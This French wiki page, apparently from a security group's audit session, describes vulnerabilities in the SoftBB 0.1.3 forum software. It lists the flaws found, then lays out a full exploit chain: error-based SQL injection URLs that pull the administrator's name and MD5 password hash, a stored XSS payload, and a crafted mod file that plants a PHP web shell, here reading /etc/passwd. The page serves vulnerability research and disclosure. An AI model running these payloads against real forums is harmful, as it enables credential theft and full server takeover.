Outils d'utilisateurs
zenk_roulettes:zenk_roulette_4
Zenk Roulette 4 : SoftBB 0.1.3
Date : le dimanche 16 août 2010 de 20h à 01h00.
Application auditée : SoftBB 0.1.3 : http://www.softbb.net
Description : Il s'agit d'un forum très léger.
Pad : http://piratepad.net/dlkZwSHTPz
Défauts de sécurité :
De nombreux défauts de sécurité ont été identifiés. Certains sont exploitables en tant que simple visiteur (enregistré ou non) du site et d'autres ne sont accessibles qu'à une personne ayant les droits d'administrateur.
- Full Path Disclosure:
http://localhost/softbb/index.php?page[]=reg
- Les mots de passes sont stockés dans la base de données sous la forme de simples hash md5.
- Une XSS Persistante dans les champs de modifications de style : http://localhost/softbb/admin/index.php?page=gest_opt_mod ” onmouseover='javascript:alert(1337)' foo=”
- De nombreuses SQLi (sh4ka, SIG) :
redir_last_post_list.php - ligne 12 et 16 addmembre.php - lignes 47 et 51 moveto.php - ligne 156 post.php, delgroupe.php, delpost.php, delforum.php
- Possibilitée d'uploader un fichier php sur le serveur par le biais de l'interface de gestion des mods (bik3te).
Solution retenue :
- Afin d'obtenir un Shell sur le serveur hébergeant un forum SoftBB, la solution la plus aisée est la suivante.
- Exploitation d'une SQLi accessible en tant que simple utilisateur afin d'obtenir :
Le nom de l'administrateur
http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(pseudo)FROM(softbb_membres)WHERE id=1))))
Les 31 premiers caractères du hash du mot de passe de l'administrateur
http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(mdp)FROM(softbb_membres)WHERE id=1))))
Le 32ème caractère du hash du mot de passe de l'administrateur
http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(SUBSTR(mdp,32,32))FROM(softbb_membres)WHERE id=1))))
- Interrogation de Sorcier_FXK (ou de John) à propos du mot de passe en clair.
- Connexion à l'interface d'administration du site.
- Exploitation de la faille d'upload dans l'interface de gestion des mods :
- Créer un fichier exploit.sbbmod (bik3te) contenant :
#*#*#*#*#*# I N F O S #*#*#*#*#*#
#*#*# NOM du mod : exploit
#*#*# AUTEUR : Zenk-Security
#*#*# DESCRIPTION : Exploitation de la faille d'upload
#*#*# DEPENDANCE1 :
#*#*# DEPENDANCE2 :
#*#*# VERSION : 1
#*#*#*#*#*# E X E C U T I O N #*#*#*#*#*#
#*#*# DEBUT ETAPE 1 #*#*#
##=> AJOUTER FICHIER:
<?php system("cat /etc/passwd"); ?>
##=> NOM:
admin/exploit.php
#*#*# FIN ETAPE 1 #*#*#
- Interface de gestion des mods sur http://localhost/softbb/admin/index.php?page=mods_index
- Uploader le fichier exploit.sbbmod et aller sur http://localhost/softbb/admin/exploit.php
zenk_roulettes/zenk_roulette_4.txt · Dernière modification: 2017/04/09 15:33 (modification externe)
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
